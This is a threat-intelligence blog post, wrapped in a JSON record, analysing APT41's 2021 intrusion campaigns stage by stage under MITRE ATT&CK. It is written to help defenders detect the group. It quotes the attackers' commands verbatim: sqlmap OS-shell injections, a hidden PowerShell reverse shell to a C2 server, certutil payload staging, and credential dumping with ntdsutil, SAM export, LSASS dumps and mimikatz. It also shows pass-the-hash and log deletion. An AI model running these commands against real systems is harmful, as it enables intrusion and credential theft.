{
	"id": "cd6cc91c-d1f2-48df-ae5e-e7116cd4cbda",
	"created_at": "2026-05-01T03:10:32.271568Z",
	"updated_at": "2026-05-01T03:10:50.966283Z",
	"deleted_at": null,
	"sha1_hash": "9f254057fef99f7fe265e4a8a770f2f7099827cd",
	"title": "APT41 World Tour 2021 on a tight schedule",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8575067,
	"plain_text": "APT41 World Tour 2021 on a tight schedule\r\nArchived: 2026-05-01 02:03:02 UTC\r\nIn March 2022 one of the oldest state-sponsored hacker groups, APT41, breached government networks in six US states,\r\nincluding by exploiting a vulnerability in a livestock management system, Mandiant investigators have reported.\r\nThroughout 2021, we closely watched APT41’s activity using our system called Group-IB Threat Intelligence, which is\r\ncontinuously enriched with indicators of compromise (IOCs) and new rules for hunting hacker groups and threat actors. Our\r\nefforts have resulted in about 80 proactive notifications to private and government organizations worldwide regarding\r\nAPT41 attacks (both in progress and completed) against their infrastructures so that the organizations could take the\r\nnecessary steps to protect themselves or search for traces of compromise in their networks. The data about the tactics,\r\ntechniques and procedures (TTPs) used by the attackers that we collected helped us attribute the group’s other attacks. Using\r\nthis data, we identified the threat actors’ “work” schedule, which makes it possible to describe their origin in more detail. In\r\nthis blog post, we share our findings and describe the main methods, tactics and tools used by one of the most dangerous\r\nthreat groups out there, APT41, in 2021.\r\nThis blog post, which was written to bring together existing knowledge according to the MITRE ATT\u0026CK (Adversarial\r\nTactics, Techniques \u0026 Common Knowledge) framework, details how the hackers conducted reconnaissance, gained initial\r\naccess, ensured persistence and moved across the network, as well as what they were looking for on the compromised\r\ndevices. In addition, we share interesting findings such as the “work” schedule and working days of the attackers, together\r\nwith artifacts they left behind.\r\nThe first thing we want to mention is that APT41 used an unusual method of creating payloads on target servers, which\r\ninvolves writing an encoded payload in the form of a Cobalt Strike Beacon to a file in multiple stages. To search for and\r\nexploit vulnerabilities, the group uses popular tools such as Acunetix, Nmap, JexBoss, sqlmap, and fofa.su (a Chinese\r\nequivalent of Shodan).\r\nInterestingly, according to sqlmap logs, the threat actors breached only half of the websites they were interested in. This\r\nsuggests that even hackers like APT41 do not always go out of their way to ensure that a breach is successful.\r\nThis blog post also uncovers subnets from which the threat actors connected to their C\u0026C servers, which is further evidence\r\nconfirming the threat’s country of origin.\r\nFor the first time, we were able to identify the group’s working hours in 2021, which are similar to regular office business\r\nhours.\r\nIT directors, heads of cybersecurity teams, SOC analysts and incident response specialists are likely to find this material\r\nuseful. Our goal is to reduce financial losses and infrastructure downtime as well as to help take preventive measures to fend\r\noff APT41 attacks.\r\nIn the conclusion section, we give advice on how to identify the group’s infrastructure and protect yours. Let us hunt\r\ntogether for the threats, and contribute to the fight against cybercrime — a mission worthy of a superhero.\r\nWho are APT41?\r\nA state-sponsored group whose goals include cyber espionage and financial gain\r\nActive since at least 2007\r\nAlso known as BARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti\r\nUmbrella, Double Dragon\r\nSome of the group’s members were indicted by the US Department of Justice in 2020; charges against them include\r\nunauthorized access to protected computers, aggravated identity theft, money laundering, and wire fraud\r\nKey findings\r\nWe estimate that in 2021 APT41 compromised and gained various levels of access to at least 13 organizations\r\nworldwide.\r\nThe group’s targets include government and private organizations based in the US, Taiwan, India, Thailand, China,\r\nHong Kong, Mongolia, Indonesia, Vietnam, Bangladesh, Ireland, Brunei, and the UK.\r\nIn the campaigns that we analyzed, APT41 targeted the following industries: the government sector, manufacturing,\r\nhealthcare, logistics, hospitality, finance, education, telecommunications, consulting, sports, media, and travel. The\r\ntargets also included a political group, military organizations, and airlines.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 1 of 23\n\nTo conduct reconnaissance, the threat actors use tools such as Acunetix, Nmap, Sqlmap, OneForAll, subdomain3,\r\nsubDomainsBrute, and Sublist3r.\r\nAs an initial vector, the group uses web applications vulnerable to SQL injection attacks.\r\nBy performing SQL injections, APT41 gains access to the command shell of a targeted server and becomes able to\r\nexecute commands.\r\nWe estimate that in 2021 APT41 detected and exploited SQL injection opportunities in 43 out of 86 web applications\r\nthat they probed.\r\nThe main tool used in their campaigns is a custom Cobalt Strike Beacon.\r\nAPT41’s “working” days are Monday to Friday. They usually start at 10 AM and finish around 7 PM (UTC+8).\r\nAttack geography and target industries\r\nFirst, we will list all the countries and industries that came to our attention in 2021. Over this period, APT41 conducted at\r\nleast four malicious campaigns, which we named based on the domain names used in the attacks: ColunmTK,\r\nDelayLinkTK, Mute-Pond, and Gentle-Voice.\r\nThe targets in these campaigns were organizations in the US, Taiwan, India, China, Thailand, Hong Kong, Mongolia,\r\nIndonesia, Vietnam, Bangladesh, Ireland, Brunei, and the UK:\r\nNews agencies, government organizations, a major electronics manufacturer, and a logistics company in Taiwan\r\nA software developer and several companies that own a chain of hotels in the US\r\nA financial organization and an educational entity in Vietnam\r\nA news agency and a software developer in China\r\nAn Indian airline\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 2 of 23\n\nTTPs\r\nThis section describes APT41’s tactics, techniques and procedures that came to the attention of Group-IB’s Threat\r\nIntelligence team in 2021.\r\nReconnaissance\r\nThe first stage of any attack is reconnaissance, as part of which threat actors use a wide range of techniques to collect data\r\nabout the target organization. They can be divided into two categories: active and passive scanning. Below is a list of tools\r\nused by APT41 from both categories:\r\nActive scanning. T.1595:\r\nAcunetix vulnerability scanner\r\nNmap network scanner\r\nUtilities for brute-forcing directories on web servers: OneForAll, subdomain3, subDomainsBrute, Sublist3r\r\nJexBoss, a tool for searching for and exploiting vulnerabilities in Jbos and other Java applications\r\nPassive scanning. Search Open Technical Databases: Scan Databases T1596.005:\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 3 of 23\n\nfofa.su (a Chinese equivalent of shodan.io) scans the Internet and collects information about open ports and services\r\nrunning on them, which enables attackers to determine their targets and conduct attacks more effectively.\r\nInitial Access\r\nExploit public-facing application – T1190\r\nA major question for an investigator is how the attackers penetrated the target system. At the penetration stage, APT41 threat\r\nactors used various techniques, including spear-phishing emails, exploiting a range of vulnerabilities (including\r\nProxylogon), and watering hole and supply chain attacks. In the campaigns we analyzed, in some cases the threat actors\r\npenetrated target systems using SQL injections. Below we describe the commands used by APT41 in detail. Such attacks\r\nwere carried out with the publicly available tool SQLmap, which the attackers used for multiple purposes.\r\nIn some organizations APT41 members gained access to the command shell of a target server and were able to execute\r\ncertain commands. The group also used this tool to upload files to the target server. At this stage, the files were either Cobalt\r\nStrike Beacons or custom web shells.\r\nIn other cases, the threat actors gained access to databases with information about existing accounts, lists of employees, and\r\nplaintext and hashed passwords.\r\nNevertheless, the main tool that the attackers used in their campaigns was Cobalt Strike Beacon.\r\nSQLmap launched in various attacks:\r\npython sqlmap.py -r [Company1_domain].txt --tamper=space2comment --random-agent -p\r\nctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword --os-shell python\r\nsqlmap.py -r [Company2_domain].txt -p \"ctl00%24MainContent%24txtUserName,ctl00%24MainContent%24txtPassword\"\r\n--is-dba --hex sqlmap.py -u [Company3_domain]/content.php?id=2141\u0026sub=153 --random-agent --tamper=space2comment\r\n--time-sec=10 --current-user python sqlmap.py -r [Company4_domain] -p\r\n\"ctl00%24ContentPlaceHolder1%24txtUserName,ctl00%24ContentPlaceHolder1%24txtPassword\" --file-write=\"/root/sqlmap/{Redacted_filename}.aspx\" --file-dest=\"{Redacted_filepath}\\\\login1.aspx\" python sqlmap.py -u\r\n\"http://[Company5_domain]/[redacted]/[redacted]/[redacted].php/?\r\npage1=DM\u0026page2=TOTAL_DATA_DOWNLOAD\u0026page3=TOTAL_DATA_DOWNLOAD\" -p \"page1\" --file-read\r\n\"/etc/passwd\"\r\nThe SQL injections enabled the threat actors to gain various levels of access to 43 out 86 websites they probed. The\r\nfollowing diagrams were built based on sqlmap logs. According to this data, MySQL was installed on most of the\r\ncompromised websites.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 4 of 23\n\nExecution\r\nWindows Command Shell – T1059.003 Command and Scripting Interpreter\r\nAt this stage of attack, in order to upload malicious code to target devices and execute it, the threat actors chose the\r\nfollowing unique method:\r\n1. Once the payload is compiled, it is encoded in Base64.\r\n2. The encoded payload is divided into chunks of 775 characters and added to a text file using the following command:\r\nEcho [Base64]{775} \u003e\u003e C:\\dns.txt\r\n3. Once the encoded payload has been written to a file, the utility called certutil with the parameter —decode is\r\nlaunched. The utility converts the Base64-encoded payload into an .exe file. Certutil is a built-in tool in Windows\r\nsystems.\r\n4. After the file is decoded, the attackers launch certutil again, with the parameter —hashfile. This parameter is\r\nnecessary to obtain the hash of the resulting file. This action has to do with the fact that the attackers conduct each\r\niteration manually and could make a mistake at a certain point. Checking the file hash helps ensure that the data has\r\nbeen written correctly and that the payload has been decoded without any errors.\r\n5. The file is then renamed and sent to other directories to cover any tracks, after which the attackers launch it.\r\nThey used Cobalt Strike Beacon as a payload. In one of the observed cases, in order to write the entire payload to a file, the\r\nthreat actors needed to repeat this action 154 times.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 5 of 23\n\necho\r\nTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAA4fu\r\n\u003e\u003e C:\\dns.txt ---- echo\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nC:\\dns.txt echo\r\n5kgXfx+Ig8S1vr8p7ifpkRNTIwypOpYrBDdptgjbLcJBcAUqEK/+D85bYT9RGiYYZ9UR4ejo6ca0B/iWEW8b+R286/evHFAXOOcuv4l8ceD1GQ9dDA\r\nC:\\dns.txt\r\ncertutil -decode C:\\dns.txt C:\\dns.exe certutil -hashfile C:\\dns.exe copy C:\\dns.exe C:\\WINDOWS\\dns.exe move C:\\dns.exe\r\nC:\\windows\\mciwave.exe\r\nThe same method of dividing the payload was observed in the network belonging to another organization, where the threat\r\nactors divided the code into chunks of 1,024 characters. To write the payload fully, in this case they needed 128 iterations.\r\necho\r\no3wiZy3M7pERynevamNQTtL5VZf3C+vS22sRbsUgj8Lw005hIB1mVlNyvdw5GWrKgdMrpkJ2mYamD3sHBuU6yKJ8M3JwfxkkhEtSdi2WJdVfM8zh\r\n\u003e\u003e C:\\temp\\bug.txt echo\r\nWv39JqjpZEGW7rjPYW5t09Ck9AQTc94kJ5nfTPEh6KVvRAeuMw23lQdZy/ZquMQOcy9ozRl7OyrQPtKwHYC0+pZ5Lg0Jt5DXREFurZwk0FJzMkT\r\n\u003e\u003e C:\\temp\\bug.txt\r\nBelow are other identified methods of uploading and executing malicious files. These are not unique:\r\nCommand and Scripting Interpreter: PowerShell – T1059.001\r\nAPT41 used PowerShell to obtain a reverse shell. The PowerShell code that the group used was executed in stealth mode\r\nand meant that the device it was executed on could communicate with the C\u0026C server, which in turn allowed the threat\r\nactors to execute remote commands.\r\npowershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('{redacted}',\r\n80);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function\r\nWriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String +\r\n'SHELL\u003e ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0,\r\n$Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try\r\n{Invoke-Expression $Command 2\u003e\u00261 | Out-String} catch {$_ | Out-String}WriteToStream\r\n($Output)}$StreamWriter.Close()\"\r\nScheduled Task/Job: Scheduled Task – T1053.005\r\nTask Scheduler was used to launch malicious files on computers where the threat actors already had sessions as well as on\r\ncomputers that the group discovered during reconnaissance.\r\nSCHTASKS /Create /S 192.168.100.19 /U \"{redacted}\\administrator\" /P \"!@#Virg0#@!\" /RU SYSTEM /SC DAILY /TN\r\nExec2022 /TR \"C:\\windows\\system32\\taskhosts.exe\" SCHTASKS /run /S 192.168.100.19 /U \"{redacted}\\administrator\" /P\r\n\"!@#Virg0#@!\" /TN Exec2022\r\nSystem Services: Service Execution – T1569.002\r\nWindows services were created and launched with the aim of running either an executable or a script file called install.bat.\r\nWe described it in our blog post about the ColunmTK campaign. This file has been mentioned several times by other\r\nvendors (e.g., Mandiant), which is why we are not describing it in detail here.\r\nsc \\\\172.16.2.146 Create SuperIe binPath= \"cmd.exe /k \"c:\\users\\public\\install.bat\"; sc \\\\192.168.111.112 create res\r\nbinpath=\"C:\\PerfLogs\\vmserver.exe\"; sc \\\\192.168.111.112 start res; sc query LxpSrvc; sc delete LxpSrvc;\r\nWindows Management Instrumentation – T1047\r\nThe hackers did not overlook Windows Management Instrumentation and used the technique in several malicious\r\ncampaigns.\r\nwmic /node:172.19.97.102 /user:{redacted}\\{redacted} /password:P$ssw0rd0006 process call create\r\n\"C:\\users\\Public\\COMSysUpdate.exe\" wmic /node:172.21.2.177 /user:{redacted}\\{redacted} /password:Passw0rd@123\r\nprocess call create \"c:\\users\\Public\\install.bat\"\r\nPersistence\r\nTo ensure persistence in target systems, the attackers used Task Scheduler and created Windows services.\r\nScheduled Task/Job: At (Windows) – T1053.002\r\nschtasks /create /s 192.168.111.3 /u {redacted} /p {redacted} /tn dda /sc onstart /tr C:\\PerfLogs\\vmserver64.exe /ru system /f\r\nSCHTASKS /Create /S 10.200.244.222 /U test\\administrator /P {redacted} /RU \"system\" /tn rlsv /sc DAILY /tr c:\\2012.bat\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 6 of 23\n\n/F SCHTASKS /Create /S 192.168.100.19 /U \"{redacted}\\administrator\" /P {redacted} /RU SYSTEM /SC DAILY /TN\r\nExec2022 /TR \"C:\\windows\\system32\\taskhosts.exe\" schtasks /create /tn rlsv1 /U test\\Administrator /P {redacted} /tr\r\nC:\\2012.bat /sc DAILY /s 10.200.244.222 /RU system SCHTASKS /Create /RU SYSTEM /SC ONSTART /TN Update /TR\r\n\"C:\\windows\\system32\\calc.exe\" SCHTASKS /Create /RU SYSTEM /SC ONSTART /TN dllhosts /TR \"dllhosts.exe\"\r\nschtasks.exe /s 192.168.0.28 /u \"administrator\" /p {redacted} /Create /tn VMUSS /tr \"c:\\users\\public\\install.bat\" /st 15:58 /sc\r\nonce /ru system\r\nSystem Services: Service Execution – T1543.003\r\nsc \\\\172.26.16.81 Create SuperIe binPath= \"cmd.exe /k c:\\users\\public\\SecurityHealthSystray.exe\" sc Create syscmd\r\nbinpath=\"cmd/k start\"type= own type= interact sc \\\\192.168.111.112 create res binpath=\"C:\\PerfLogs\\vmserver.exe\" sc start\r\nLxpSrvc\r\nBoot or Logon Autostart Execution: Registry Run Keys / Startup Folder – T1547.001\r\nIn some cases the threat actors placed their malicious files in the startup folder on remote computers, which made the files\r\nexecute every time the victim’s operating system was launched.\r\ncopy C:\\temp\\LxpSvc.exe \"\\\\192.168.100.4\\c$\\Users\\administrator.{redacted}\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\LxpSvc.exe\"\r\nPrivilege Escalation\r\nOur analysis did not reveal any instances of APT41 using unique ways of escalating privileges in the network. In addition to\r\nthe standard capabilities of Cobalt Strike, for such purposes APT41 mainly used additional modules and cna. Publicly\r\navailable tools for local privilege escalation (such as BadPotato) were also used to establish persistence. Moreover, the\r\nattackers used password hashes or accounts obtained at the reconnaissance stage.\r\ncmd.exe /c c:\\windows\\Temp\\BadPotatoNet4.exe c:\\windows\\Temp\\COMSysCon.exe; execute-assembly\r\nC:\\Users\\Administrator\\Desktop\\SweetPotato.exe E:\\Projects\\Operations\\uploads\\documents\\docs\\AxInstSV.exe.\r\nDefense Evasion\r\nObfuscated Files or Information: Software Packing – T1027.002\r\nBeing discreet and staying in the victim’s network unnoticed for as long as possible is the goal of any APT. How did APT41\r\nmembers try to avoid being noticed and cover their tracks? The threat actors used the well-known protection tool Themida to\r\nobfuscate their malicious files.\r\nIndicator Removal on Host: File Deletion – T1070.004\r\nWhen certain files were no longer needed, the attackers deleted them.\r\ndel C:\\temp\\LxpSvc.exe del c:\\users\\public\\BadPotatoNet4.exe del \\\\172.16.2.21\\c$\\users\\Public\\SecurityHealthSystray.dll\r\ndel \\\\172.16.2.21\\c$\\users\\Public\\SecurityHealthSystra.ocx copy \"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\" C:\\PerfLogs\\mwt.evtx rm\r\nC:\\PerfLogs\\mwt.evtx\r\nFile and Directory Permissions Modification: Windows File and Directory Permissions Modification – T1222\r\nicacls \\\\192.168.0.243\\c$\\www\\{redacted}\\test2.asp /grant IIS_IUSRS:F\r\nImpair Defenses: Indicator Blocking – T1562.006\r\nAs mentioned earlier, Cobalt Strike was the main tool used in all the campaigns.\r\nThe threat actors developed a custom injector that makes it possible to bypass Event Tracing for Windows (ETW),\r\nthereby making the process invisible to the logging system in Windows.\r\nThe second noteworthy feature of this injector is a method taken from an open GitHub repository. The idea is to be\r\nable to launch a new process in a way as to ensure that neither Windows nor antivirus software can inject their\r\nbinaries into this process, which enables the threat actors to bypass built-in antivirus tools.\r\nThe tool is called StealthMutant and it has been described in detail by researchers at Trend Micro.\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 7 of 23\n\nCredential Access\r\nThis section outlines how the threat actors obtained credentials. To do so, APT41 uses several different, fairly popular\r\ntechniques.\r\nOS Credential Dumping: NTDS – T1003.003\r\nThe Group-IB Threat Intelligence team discovered that 2021 APT41 campaigns most often involved a Windows utility\r\ncalled Ntdsutil. The attackers used the tool to obtain a copy of the ntds.dit file, which is a database that stores Active\r\nDirectory data, including information about user objects, groups, and group membership. The database also includes the\r\npassword hashes for all the users of the domain.\r\nntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\perflogs\\temp\" q q ntdsutil \"activate instance ntds\" \"ifm\" \"create full\r\nC:\\PerfLogs\\temp\" quit quit\r\nOS Credential Dumping: Security Account Manager – T1003.002\r\nThe threat actors also extracted account data from the Security Account Manager (SAM). SAM manages the Windows\r\naccount database, which includes storing passwords and private user data, grouping the logical structure of accounts, setting\r\nsecurity policies, collecting statistics, and controlling access to the database. This data is available either in the registry key\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 8 of 23\n\nHKEY_LOCAL_MACHINE\\SAM\\SAM or in a binary file at %WINDIR%\\System32\\Config\\SAM. The attackers tried to\r\nmake a copy of this database from the registry using the “reg save” command or by exploiting volume shadow copies.\r\nreg save HKLM\\SAM C:\\perflogs \\sam.save copy \\\\?\r\n\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy11\\Windows\\System32\\config\\SAM c:\\users\\public\\SAM\r\nOS Credential Dumping: LSASS Memory -T1003.001\r\nAnother source of account credentials is the Local Security Authority Subsystem Service (LSASS) memory. It is a process\r\nin Microsoft Windows operating systems that enforces the security policy on the system. It verifies users logging on to a\r\nWindows computer or server, handles password changes, and creates access tokens. To dump the LSASS process, the threat\r\nactors used the utilities Procdump and Mimikatz.\r\nprocdump64.exe -accepteula -ma lsass.exe lsass.dmp C:\\mi.exe \"\"privilege::debug\"\" \"\"sekurlsa::logonpasswords full\"\" exit\r\n\u003e\u003e C:\\log.tx mimikatz's sekurlsa::logonpasswords\r\nCredentials from Password Stores: Credentials from Web Browsers – T1555.003\r\nThe threat actors used BrowserGhost, which is a tool designed to obtain credentials from browsers.\r\nBrowserGhost.exe \u003e\u003e iis.txt\r\nUnsecured Credentials: Credentials In Files – T1552.001\r\nThe attackers also searched for strings that contain keywords like “user” or “password” in specific files or entire directories.\r\nfindstr /c:\"User\" /c:\"Password\" /si web.config findstr /c:\"User ID=\" /c:\"Password=\"\r\nDiscovery\r\nThreat actors usually use this stage to obtain more information about the infected computer and its local network. At this\r\npoint, cybercriminals most often leverage the tools built into the operating system.\r\nAccount Discovery – T1087\r\nThe Net utility is used to display information about the computer’s network configuration. The utility helped the adversaries\r\ngather information about domain group membership and collect lists of administrators.\r\nnet user /domain \u003e 1.txt net user net localgroup administrators net accounts /domain net group \"Domain Admins\"\r\nSystem Information Discovery – T1082\r\nAt this stage, the attackers gathered information about the system basic configuration (e.g., the Windows version or system\r\narchitecture).\r\necho %PROCESSOR_ARCHITECTURE% systeminfo whoami net config Workstation\r\nPermission Groups Discovery – T1069\r\nThe adversary obtained a list of objects from Windows groups as follows:\r\nnet group \"Domain Admins\" /domain net group \"domain Controllers\" net group \"Exchange Servers\" net group \"Schema\r\nAdmins\" net group \"Protected Users\" net group \"Enterprise Admins\" net group \"Enterprise Read-only Domain Controllers\"\r\nnet group \"Exchange Domain Servers\"\r\nQuery Registry – T1012\r\nThe hackers made queries to the registry to obtain information about the currently used RDP ports or network\r\nconfigurations.\r\nreg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server\\WinStations\\RDP-Tcp /v PortNumber\" reg\r\nquery \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" reg query\r\n\"HKEY_LOCAL_MACHINE \\SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters\\Interfaces\\{1f777394-0b42-11e3-\r\n80ad-806e6f6e6963}\"\r\nDomain Trust Discovery – T1482\r\ndsquery site\r\nSystem Time Discovery – T1124\r\nnet time /domain\r\nProcess Discovery – T1057\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 9 of 23\n\nIn some cases, the threat actors conducted reconnaissance on remote devices to establish whether files with certain names\r\nwere running on them. The attackers had downloaded these files to remote devices earlier.\r\ntasklist /pid 1428 /f tasklist /s 172.16.2.132 /u test\\administrator /p {redacted} tasklist | findstr update_x64.exe\r\nNetwork Service Scanning – T1046\r\nAt this stage, the threat actors also used a publicly available tool called cping to identify local computers vulnerable to SMB\r\nattacks.\r\nC:\\PerfLogs\\cping40.exe scan smbvul 10.0.0.1 10.0.10.1 \u003e 10.txt cping40.exe scan smbvul 192.168.20.1 192.168.29.1 \u003e\r\n30.txt\r\nNetwork Share Discovery – T1135\r\nThe threat actors attempted to detect available network drives:\r\nnet share net view /DOMAIN\r\nSystem Network Configuration Discovery – T1016\r\nOne of the ways in which the threat actor obtained information about the available network configuration was to access the\r\nregistry key directly:\r\nreg query \"HKEY_LOCAL_MACHINE \\SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters\\Interfaces\\{1f777394-\r\n0b42-11e3-80ad-806e6f6e6963}\"\r\nSystem Network Connections Discovery – T1049\r\nTo identify network connections, the hackers used a built-in utility called netstat:\r\nnetstat -ano netstat -r netstat -an netstat -aon|findstr \"8080\" netstat -ano | findstr dns.exe\r\nRemote System Discovery – T1018\r\nThe hackers used the Ping command with a single echo request to identify other devices on the local network. In order to\r\nsimplify their tasks, they used a FOR loop. They also used the SETSPN utility to identify on which devices in the domain a\r\nparticular service was running. This helped the attackers identify which devices were running the following services: IIS,\r\nSQL and MSSQL.\r\nIt is important to note that in one of the cases we analyzed, the threat actors used the “payload” string instead of the\r\nnecessary one, which indicates that the command was copied from another source.\r\nping -n 1 PIST-FILE-SRV for /l %i in (1,1,255) do @ping 172.67.204.%i -w 1 -n 1|find /i \"ttl=\" setspn -T\r\n[target_company_name4] -Q */* | payload setspn -T [target_company_name6] -Q */* | findstr IIS setspn -T\r\n[target_company_name5] -Q */* | findstr SQL setspn -T [target_company_name6] -Q */* | findstr MSSQL\r\nLateral Movement\r\nTo move laterally, the threat actors used credentials gathered at the previous stage. If they only had password hashes, they\r\ncarried out Pass-The-Hash attacks using Mimikatz.\r\nUse Alternate Authentication Material: Pass the Hash – T1550.002\r\nmimikatz's sekurlsa::pth /user:Administrator /domain:{redacted} /ntlm:{redacted} /run:\"%COMSPEC% /c echo\r\n70c64df2976 \u003e \\\\.\\pipe\\277bf3\" mimikatz's sekurlsa::pth /user:{redacted} /domain:{redacted} /ntlm:{redacted}\r\n/run:\"%COMSPEC% /c echo 22074328564 \u003e \\\\.\\pipe\\bce0a1\"\r\nLateral Tool Transfer – T1570\r\njump psexec64 {redacted} dns windows/beacon_dns/reverse_dns_txt (ns1.colunm.tk:53) on {redacted} via Service Control\r\nManager (\\\\[redacted]\\ADMIN$\\c3632b3.exe) copy c:\\users\\public\\COMSysUpdate.exe\r\n\\\\172.19.97.101\\c$\\users\\public\\COMSysUpdate.exe\r\nCollection\r\nArchive Collected Data: Archive via Utility – T1560.001\r\nTo collect data, APT41 downloaded a portable archiver file to compromised devices. The group archived the necessary files\r\nand exfiltrated them to their intermediate server.\r\n7z.exe a syslog.7z Intl 7z.exe a iislog.7z Intl 7z.exe a Ops.7z C:\\PerfLogs\\Ops\\ C:\\perflogs\\7z.exe a -tzip C:\\perflogs\\nt.zip\r\nC:\\perflogs\\temp\\\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 10 of 23\n\nData from Configuration Repository – T1602\r\nOn the network belonging to a software developer, the hackers gained access to the developer’s private GitHub repository.\r\nThe repository was used to store various sensitive data such as credentials for remote servers, private certificates, and a list\r\nof servers.\r\nshell git clone \"ssh://jenkins@{redacted}:29418/DevOps/Playbook2\" shell git clone\r\n\"ssh://jenkins@{redacted}:29418/DevOps/Inventory/Cloud/Intl\" shell git clone\r\n\"ssh://jenkins@192.168.0.251:29418/DevOps/Inventory\"\r\nData from Local System – T1005\r\nThe group obtained files from shadow copies and the Windows logging system.\r\nvssadmin list shadows vssadmin create shadow /for=c: vssadmin delete shadows /for=c: /quiet esentutl /p /o ntds.dit copy\r\n\"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\" copy\r\n\"C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx\" \"C:\\PerfLogs\\mwt.evtx\" rd:true /q:\"*[System[(EventID=4624 or\r\nEventID=4648 or EventID=4672)] and EventData[(Data[@Name='LogonType']='2' or Data[@Name='LogonType']='10')]]\"|\r\nfindstr /i /c:\"Date\" /c:\"Logon Type:\" / c:\"Account Name\" /c:\"Workstation Name:\" / c:\"Source Network Address\"\r\nCommand and Control\r\nAs mentioned above, most APT41 attacks were conducted using Cobalt Strike.\r\nApplication Layer Protocol: Web Protocols – T1071.001\r\nThe group used HTTP and HTTPS listeners to communicate with C\u0026C servers.\r\nApplication Layer Protocol: DNS – T1071.004\r\nTo hide all communication with C\u0026C servers, the threat actors also used DNS tunnels.\r\nIngress Tool Transfer – T1105\r\nThe threat actors used Cobalt Strike to upload their files to compromised devices. For certain targeted organizations, the\r\ngroup uploaded files from special directories named after the compromised organization.\r\nupload C:\\Users\\Administrator\\Desktop\\cs\\dns\\COMSysUpdate.ocx upload\r\nC:\\Users\\Administrator\\Desktop\\webshell\\uploada4.aspx upload c:\\users\\alex\\desktop\\smb.exe upload\r\nC:\\Users\\Administrator\\Desktop\\cs\\SecurityHealthSystray.dll upload C:\\Users\\Administrator\\Desktop\\cs\\install.bat upload\r\nC:\\Users\\jack\\Desktop\\tmp\\cs_shell\\server\\install.bat upload C:\\Users\\jack\\Desktop\\tmp\\cs_shell\\server\\bthsvc64.dll upload\r\nC:\\Users\\jack\\Desktop\\tmp\\procdump64.exe upload C:\\Users\\jack\\Desktop\\{redacted}\\244\\mciwave32.dll upload\r\nhttps://blog.group-ib.com/apt41-world-tour-2021\r\nPage 11 of 23\n\nC:\\Users\\Admin\\Desktop\\{redacted}\\HTTPS\\LxpSvc.exe upload C:\\Users\\Admin\\Desktop\\Webshell upload\r\nC:\\Users\\Admin\\Desktop\\{redacted}\\webshell\\test4.aspx upload C:\\Users\\Admin\\Desktop\\{redacted}\\远控\r\n\\service\\install.bat upload C:\\Users\\Admin\\Desktop\\{redacted}\\LxpSrvc.dll upload C:\\Users\\Admin\\Desktop\\{redacted}\\远\r\n控\\exe\\dfss.dll upload C:\\Users\\Administrator\\Desktop\\BadPotatoNet4.exe\r\nProxy: Internal Proxy – T1090.001\r\nIn the attacks we analyzed, APT41 often used a tool for proxying traffic called FRPC.\r\nfrcp.exe -c frcp.ini\r\nExfiltration\r\nExfiltration Over C2 Channel – T1041\r\nAt the exfiltration stage, APT41 gained access to various server configurations, backup data, and user data. The group most\r\nlikely did not exfiltrate a large amount of confidential documents.\r\ndownload D:\\projects\\{redacted}\\web.config; download D:\\projects\\{redacted}\\css\\help.txt; download D:\\System Volume\r\nInformation\\002.dat; download D:\\projects\\{redacted}\\Web.config; download D:\\{redacted}\\\r\n{redacted}20210301120008.txt; download c:\\ftpcmd.dat; download c:\\AppTextFile.txt; download\r\nc:\\Users\\Administrator\\Desktop\\OfcNTCer.dat; download c:\\Users\\{redacted}\\Desktop\\172.16.11.103.png; download\r\nc:\\Users\\{redacted}\\Desktop\\FTP batch\\ftp_servername.bat; download c:\\Users\\{redacted}\\Desktop\\FTP batch\\\r\n[redacted].bat; download c:\\Users\\{redacted}\\Desktop\\tm remote chat.txt; download c:\\Temp\\netstat.txt; download\r\nc:\\Program Files (x86)\\Trend Micro\\OfficeScan\\PCCSRV\\Admin\\web.config; download c:\\Program Files (x86)\\Trend\r\nMicro\\OfficeScan\\PCCSRV\\Admin\\Utility\\SQL\\web.config; download 